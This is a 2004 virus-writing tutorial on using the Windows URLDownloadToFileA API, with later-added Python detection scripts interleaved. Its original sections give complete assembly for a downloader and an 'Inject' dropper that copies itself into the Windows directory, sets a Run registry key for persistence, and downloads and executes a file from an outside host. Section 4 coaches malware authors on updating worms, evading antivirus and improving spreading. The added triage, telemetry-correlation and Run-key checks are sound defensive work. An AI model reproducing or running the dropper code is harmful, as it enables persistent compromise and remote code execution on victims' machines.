                           Up to Date with the URLDownloadToFileA API
                                       by DiA[rRlf] (c)04
                                www.vx-dia.de.vu  -  DiA@rrlf.de
                           __________________________________________



:disclaimer
I am NOT responsible for any damage that you do! If you use this code, you (and only you)
are responsible for what you do with the executable files. Have fun with this...



:index_______________________
| 1. Intro                   |
| 2. The API                 |
| 3. Short Example           |
| 4. Usage Examples, theory  |
| 5. Injection Example       |
| 6. Outjection Example      |
| 7. Outro                   |
|____________________________|



:1. Intro
Hello again, today I want to show you a method to download a file from the internet (http)
to the local machine. It's very easy with the URLDownloadToFileA API, but this API is not
well documented. So I decided to write this tutorial. I hope with this code you are Up to
Date =). Have fun...



:2. The API
First of all I must say that I tested this only on Windows 98SE! But I think it works on
other Windows versions too.
The API lives in a DLL in the Windows\System directory. On my machine it is
C:\Windows\System\urlmon.dll; urlmon is the name of the DLL. We only have to load this
library to get at the URLDownloadToFileA API. Look at the Short Example to see how to work
with DLLs. Now I want to give you a short overview of the URLDownloadToFileA API:

push 0                  ;lpfnCB -> optional IBindStatusCallback, not needed here, push a 0
push 0                  ;dwReserved -> must be 0
push offset szFileName  ;full path of local file, eG "C:\DownloadedFile.exe"
push offset szURL       ;full URL of file to download, eG "http://server.cz/DownloadThis.exe"
push 0                  ;pCaller -> simply push a 0
call URLDownloadToFileA ;call the API, address obtained from the DLL

Ok, now I show you how to work with a DLL file, get the address of an API call, and then
download a file from a URL to the local machine. Let's do this...
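The hard-coded DLL path, API name and URL that a program like this keeps in its .data
section are exactly what a defender looks for when triaging a sample. The following Python
script is an added example (not part of the original tutorial) that pulls printable strings
out of a byte blob the way `strings` does and scores the indicators that a dynamically
resolved URLDownloadToFileA still leaves in clear text: the DLL name, the API name, the
LoadLibrary/GetProcAddress pair, a URL and a local executable path. SAMPLE_DATA is a
constructed stand-in for such a data section (the URL in it is a placeholder), not a real
binary.

```python
import re

# Constructed stand-in for the .data section of a small downloader: a DLL path,
# an exported API name, a URL and a local path, each NUL-terminated.  Not a real
# binary; the hostname is a placeholder.
SAMPLE_DATA = (
    b"\x00\x00C:\\Windows\\System\\urlmon.dll\x00"
    b"URLDownloadToFileA\x00"
    b"http://example.invalid/update.exe\x00"
    b"C:\\update.exe\x00"
    b"LoadLibraryA\x00GetProcAddress\x00"
)

MIN_LEN = 6


def extract_strings(blob: bytes, min_len: int = MIN_LEN) -> list[str]:
    """Return runs of printable ASCII of at least min_len bytes (like `strings`)."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]


# Indicators that survive even when the API is resolved at run time via
# GetProcAddress instead of appearing in the import table.
INDICATORS = {
    "urlmon_dll":      re.compile(r"urlmon\.dll", re.I),
    "download_api":    re.compile(r"^URLDownloadToFile[AW]$"),
    "dynamic_resolve": re.compile(r"^(LoadLibrary[AW]|GetProcAddress)$"),
    "url":             re.compile(r"^https?://", re.I),
    "local_exe_path":  re.compile(r"^[A-Za-z]:\\.*\.(exe|dll|scr)$", re.I),
}


def triage(blob: bytes) -> dict:
    """Group extracted strings by indicator and decide whether the
    'download API + URL + local executable path' combination is present."""
    strings = extract_strings(blob)
    hits = {name: [s for s in strings if rx.search(s)]
            for name, rx in INDICATORS.items()}
    hits = {k: v for k, v in hits.items() if v}
    # A program that merely links urlmon.dll is common; one that also carries a
    # URL and a destination executable path is the downloader pattern.
    downloader = {"download_api", "url", "local_exe_path"}.issubset(hits)
    return {"hits": hits, "downloader_pattern": downloader}


if __name__ == "__main__":
    for name, values in triage(SAMPLE_DATA)["hits"].items():
        print(f"{name:16s} {values}")
    print("downloader pattern:", triage(SAMPLE_DATA)["downloader_pattern"])
```

The scoring is deliberately coarse: the point is that a sample which never imports
URLDownloadToFileA by name still has to carry that name somewhere for GetProcAddress to
find it, so string-level triage catches the technique this tutorial relies on.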



:3. Short Example
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 URLtoFILE,,;
;  TLINK32 -Tpe -c -aa URLtoFILE,URLtoFILE,, import32.lib

.386
.model flat
jumps

extrn LoadLibraryA	:PROC		;to handle with the urlmon.dll
extrn GetProcAddress	:PROC		;to find the API in this DLL
extrn ExitProcess	:PROC		;to quit program
extrn MessageBoxA	:PROC		;to show a short information

.data
szDLL		db 'C:\Windows\System\urlmon.dll',0	;full path to the urlmon DLL
szAPI		db 'URLDownloadToFileA',0		;name of API to find

szURL		db 'http://home.arcor.de/vx-dia/news.html',0	;the complete url, with
								;extension of file!
szFileName	db 'C:\DiA_news.html',0	;complete path, the program download now to this
					;path on local machine

oMsg		db 'File download complete!',10,13		;only an information msg
		db 'The file is now in C:\DiA_news.html',10,13
		db '...downloaded from http://home.arcor.de/vx-dia/news.html',10,13
		db 'with the API URLDownloadToFileA from the URLmon DLL',0

.code
start:

push offset szDLL			;get DLL to handle with it
call LoadLibraryA			;handle is now in eax

push offset szAPI			;search this API address
push eax				;handle of urlmon.dll
call GetProcAddress			;address now in eax

push 0					;see "The API"
push 0
push offset szFileName			;full path of file (local)
push offset szURL			;full URL of file (http)
push 0
call eax				;call URLDownloadToFileA

push 0					;Information message
push offset szAPI
push offset oMsg
push 0
call MessageBoxA

push 0
call ExitProcess			;quit program

end start
;-----cut-----URLtoFILE.asm-----------------------------------------------------------------



:4. Usage Examples, theory
You can do a lot of things, and the greatest is that you can at any time upload another
executable file to your (or another) server. Here are some usage examples that I think
would be kewl:

- Update your malware
   You found a bug in your code, but your shitty malware is already in the wild?! No
   problem, simply write an update program that fixes or overwrites your buggy code. If
   your update program has a bug too... who cares, write a new one and upload it.

- New Encryption
   AVs detect your encrypted virus? Write a new engine and update it. AVs wouldn't detect
   this new encryption method.

- New Spreading Techniques
   You have written a kewl worm, but it is stuck on spreading? Write new spreading methods
   and update the worm. Maybe new e-mail spreading, or new ways to generate/find mail
   addresses.

- New Strings
   You wrote a P2P worm or mass mailer ... and everyone knows your fake names? Write new
   names, subjects, bodies or attachments and update your worm.

- Disinfect the System
   Microsoft, CIA, FBI, LKA and the police are hunting you, because your creation is
   spreading like hell? Write a disinfect program for your virus/worm, upload it and the
   virus/worm will remove itself. This method I show in the next two parts.



:5. Injection Example
;-----cut-----Inject.asm--------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Inject,,;
;  TLINK32 -Tpe -c -aa Inject,Inject,, import32.lib

.386
.model flat
jumps

extrn GetCommandLineA		:PROC
extrn lstrcpyA			:PROC
extrn GetWindowsDirectoryA	:PROC
extrn lstrcatA			:PROC
extrn CopyFileA			:PROC
extrn RegOpenKeyExA		:PROC
extrn RegSetValueExA		:PROC
extrn RegCloseKey		:PROC
extrn LoadLibraryA		:PROC
extrn GetProcAddress		:PROC
extrn CreateProcessA		:PROC
extrn ExitProcess		:PROC

.data

ThisFile	db 260d dup (0)				;save the commandline

WindowsDir	db 260d dup (?)				;save here the windows path
InjectFile	db '\Inject.exe',0			;after join this 2 strings:
							; C:\Windows\Inject.exe

StartupKey	db 'Software\Microsoft\Windows\CurrentVersion\Run',0   ;to start
							;Inject.exe every System start
StartupName	db 'URLtoFILE_Inject',0			;value name
							;value is "C:\Windows\Inject.exe
RegHandle	dd 0					;to handle with the registry

URLDownloadToFileA dd ?					;save here address of function

InjectDLL	db '\System\urlmon.dll',0		;join with windows directory
InjectFunction	db 'URLDownloadToFileA',0		;search for this function in the dll

InjectURL	db 'http://home.arcor.de/vx-dia/DiA.jpg',0   ;load this file from the i-net
InjectSaveAs	db '\DiA.exe',0				;save (rename) as DiA.exe in the
							;Windows directory


Crap		dd 4 dup (?)				;only for CreateProcess


.code
Inject:

call GetCommandLineA					;looks like "C:\Argh.exe" with "

inc eax							;remove first "
push eax						;copy commandline to
push offset ThisFile					;a string
call lstrcpyA

mov esi, offset ThisFile				;call GetPoint to find the '.' of ".exe"
call GetPoint						;esi now points at the '.'
mov dword ptr [esi+4],0					;erase the closing " after "exe"

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectFile					;join WindowsDir + Filename
push offset WindowsDir					; C:\Windows\Inject.exe
call lstrcatA						;the API to join 2 strings

push 0							;copy ever
push offset WindowsDir					;copy this file to
push offset ThisFile					;the windows directory
call CopyFileA						;copy it

push offset RegHandle					;save there the handle
push 001F0000h						;read and write to registry
push 0
push offset StartupKey					;Run
push 80000002h						;HKEY_LOCAL_MACHINE
call RegOpenKeyExA					;open key

push 260d						;size
push offset WindowsDir					; C:\Windows\Inject.exe
push 1							;string
push 0
push offset StartupName					;value name
push dword ptr [RegHandle]				;saved handle
call RegSetValueExA

push dword ptr [RegHandle]
call RegCloseKey					;close handle

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectDLL					;join WindowsDir + DLL Filename
push offset WindowsDir					; C:\Windows\System\urlmon.dll
call lstrcatA

push offset WindowsDir					;load library
call LoadLibraryA					;to get API

push offset InjectFunction				;function to search
push eax						;library handle
call GetProcAddress					;now in eax
mov URLDownloadToFileA, eax				;save address of function

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset InjectSaveAs				;join WindowsDir + downloaded code
push offset WindowsDir					; C:\Windows\DiA.exe
call lstrcatA

push 0
push 0
push offset WindowsDir					;save local as "DiA.exe"
push offset InjectURL					;get file from this address
push 0
call URLDownloadToFileA					;call URLDownloadToFileA

push offset Crap					;execute downloaded file
push offset Crap
push 0
push 0
push 10h						;create new process
push 0
push 0
push 0
push offset WindowsDir					;first downloaded...
push offset WindowsDir					;...and then executed - DiA.exe
call CreateProcessA

push 0
call ExitProcess					;the end


GetPoint:						;the good old procedure
cmp byte ptr [esi],'.'					;is byte a '.'
jz FoundPoint						;if yes, return
inc esi							;if not, inc esi
jmp GetPoint						;search again
FoundPoint:						;label
ret							;return

end Inject
;-----cut-----Inject.asm--------------------------------------------------------------------
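Sections 4 and 5 describe one behavioural chain: copy self into the Windows directory, set
a Run value under HKLM, load urlmon.dll, download an executable into the Windows directory
and start it. From the defender's side that chain is what endpoint telemetry correlates
on. The following Python script is an added example (not part of the original tutorial)
that runs a per-process correlation over constructed Sysmon-style events (ID 1 process
create, 7 image load, 11 file create, 13 registry value set). The event dicts, PIDs and
paths are all made up for the example; a browser process is included as a benign control
because it loads urlmon.dll too but does nothing else on the list.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style events (not real telemetry).  IDs follow Sysmon's
# numbering: 1 process create, 7 image load, 11 file create, 13 registry set.
EVENTS = [
    {"id": 1,  "pid": 1200, "ppid": 800,  "image": r"C:\Users\u\Downloads\Argh.exe"},
    {"id": 11, "pid": 1200, "target": r"C:\Windows\Inject.exe"},
    {"id": 13, "pid": 1200, "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\URLtoFILE_Inject",
               "data": r"C:\Windows\Inject.exe"},
    {"id": 7,  "pid": 1200, "image_loaded": r"C:\Windows\System\urlmon.dll"},
    {"id": 11, "pid": 1200, "target": r"C:\Windows\DiA.exe"},
    {"id": 1,  "pid": 1344, "ppid": 1200, "image": r"C:\Windows\DiA.exe"},
    # benign control: a browser also loads urlmon.dll but only writes a cache file
    {"id": 7,  "pid": 900,  "image_loaded": r"C:\Windows\System\urlmon.dll"},
    {"id": 11, "pid": 900,  "target": r"C:\Windows\Temp\page.html"},
]

RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
# An .exe written directly into the Windows directory root (not System32).
WINDIR_EXE = re.compile(r"^[A-Za-z]:\\Windows\\[^\\]+\.exe$", re.I)


def correlate(events):
    """Return one finding per process that shows at least three of: urlmon.dll
    loaded, Run value set, executable dropped in the Windows root, dropped
    executable started as a child process."""
    by_pid = defaultdict(lambda: {"image": None, "urlmon": False,
                                  "run_value": None, "dropped": set()})
    spawned = defaultdict(set)            # parent pid -> images it started
    for ev in events:
        p = by_pid[ev["pid"]]
        if ev["id"] == 1:
            p["image"] = ev["image"]
            spawned[ev["ppid"]].add(ev["image"].lower())
        elif ev["id"] == 7 and ev["image_loaded"].lower().endswith("\\urlmon.dll"):
            p["urlmon"] = True
        elif ev["id"] == 11 and WINDIR_EXE.match(ev["target"]):
            p["dropped"].add(ev["target"].lower())
        elif ev["id"] == 13 and RUN_KEY.search(ev["key"]):
            p["run_value"] = ev["key"]

    findings = []
    for pid, p in by_pid.items():
        executed = p["dropped"] & spawned[pid]   # drops this process then launched
        score = sum([p["urlmon"], p["run_value"] is not None,
                     bool(p["dropped"]), bool(executed)])
        if score >= 3:
            findings.append({"pid": pid, "image": p["image"], "score": score,
                             "run_value": p["run_value"],
                             "executed_drops": sorted(executed)})
    return findings


if __name__ == "__main__":
    for f in correlate(EVENTS):
        print(f)
```

Requiring three of the four stages keeps a plain urlmon.dll load from firing on its own,
while a process that persists via the Run key and launches what it just downloaded still
scores even if the image-load event was missed.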



:6. Outjection Example
;-----cut-----Outject.asm-------------------------------------------------------------------
; compiling:
;  TASM32 /z /ml /m3 Outject,,;
;  TLINK32 -Tpe -c -aa Outject,Outject,, import32.lib

.386
.model flat
jumps

extrn RegOpenKeyExA		:PROC
extrn RegDeleteValueA		:PROC
extrn RegCloseKey		:PROC
extrn GetWindowsDirectoryA	:PROC
extrn SetCurrentDirectoryA	:PROC
extrn DeleteFileA		:PROC
extrn MessageBoxA		:PROC
extrn ExitProcess		:PROC

.data

StartupKey	db 'Software\Microsoft\Windows\CurrentVersion\Run',0
StartupName	db 'URLtoFILE_Inject',0			;delete this value

RegHandle	dd 0					;handle of registry key

WindowsDir	db 260d dup (?)				;save here windows directory

DiAFile		db 'DiA.exe',0				;to delete this file
InjectFile	db 'Inject.exe',0			;delete this too

oTitle		db 'System is now clean',0
oMsg		db '- Registry Startup Value deleted',10,13
		db '- Inject.exe deleted',10,13
		db '- DiA.exe (this file) deleted',10,13,10,13
		db 'by DiA[rRlf] (c)04 GermanY - www.vx-dia.de.vu',0

.code
Outject:

push 0
push offset oTitle
push offset oMsg
push 0
call MessageBoxA

push offset RegHandle					;save here the handle
push 001F0000h						;read and write
push 0
push offset StartupKey					;Run
push 80000002h						;HKEY_LOCAL_MACHINE
call RegOpenKeyExA					;open key

push offset StartupName					;delete this
push dword ptr [RegHandle]				;get handle
call RegDeleteValueA

push dword ptr [RegHandle]
call RegCloseKey					;close this handle

push 260d						;size
push offset WindowsDir					;save there
call GetWindowsDirectoryA

push offset WindowsDir					;eG C:\Windows
call SetCurrentDirectoryA				;cd

push offset InjectFile
call DeleteFileA					;delete Inject.exe

push offset DiAFile					;delete DiA.exe
call DeleteFileA

push 0
call ExitProcess					;exit

end Outject
;-----cut-----Outject.asm-------------------------------------------------------------------
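Outject removes the Run value and the two files, but a clean-up is only finished when
somebody checks that the persistence entry is really gone and that nothing similar is left
behind. The following Python script is an added example (not part of the original
tutorial) that parses text in the shape of `reg query HKLM\...\Run` output, flags values
that point at an executable sitting directly in the Windows directory root or that carry
the value name used in this tutorial, and confirms a named value is absent after clean-up.
DUMP_BEFORE and DUMP_AFTER are constructed dumps for the example, not output from a real
machine.

```python
import re

# Constructed text in the shape of `reg query HKLM\...\Run` output (not a real dump).
DUMP_BEFORE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    URLtoFILE_Inject    REG_SZ    C:\Windows\Inject.exe
"""
DUMP_AFTER = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
"""

# Value lines are indented: <name> <REG_type> <data>; the key header is not.
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")
# An executable directly in the Windows root is unusual for legitimate autostart
# entries, which normally live under System32 or Program Files.
WINDIR_ROOT_EXE = re.compile(r'^"?(?:%windir%|[A-Za-z]:\\Windows)\\[^\\]+\.exe"?', re.I)


def parse_run_values(dump):
    """Return (name, type, data) tuples for every value line in the dump."""
    return [(m.group(1), m.group(2), m.group(3))
            for line in dump.splitlines() if (m := VALUE_LINE.match(line))]


def suspicious_run_values(dump, known_bad_names=("URLtoFILE_Inject",)):
    """Return (name, data, reasons) for values worth a second look."""
    out = []
    for name, _type, data in parse_run_values(dump):
        reasons = []
        if name in known_bad_names:
            reasons.append("known value name")
        if WINDIR_ROOT_EXE.match(data):
            reasons.append("exe in Windows root")
        if reasons:
            out.append((name, data, reasons))
    return out


def persistence_removed(dump, name):
    """True when no value with this name remains in the dump."""
    return all(n != name for n, _, _ in parse_run_values(dump))


if __name__ == "__main__":
    print("before:", suspicious_run_values(DUMP_BEFORE))
    print("after: ", suspicious_run_values(DUMP_AFTER))
    print("removed:", persistence_removed(DUMP_AFTER, "URLtoFILE_Inject"))
```

The value-name check only catches this tutorial's entry; the path check is the general
rule, and it is also why the Inject example's choice of C:\Windows\Inject.exe stands out in
a Run key listing.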



:7. Outro
With this API it's in your hand what your malware does! You have full control (pseudo
remote control ;) - prc =)) over it. You can update it to perfection, and if your creation
is too hot and infects everything but you don't want that, simply write a small
disinfection application. I hope you learned from this tutorial, and if you have comments,
bugs, greetz, fucks... please mail to DiA@rrlf.de
OK ppl, see you in the next tutorial, have a lot of fun-time, don't drink too much ;)
bye, DiA[rRlf]
                                                                                  07.06.04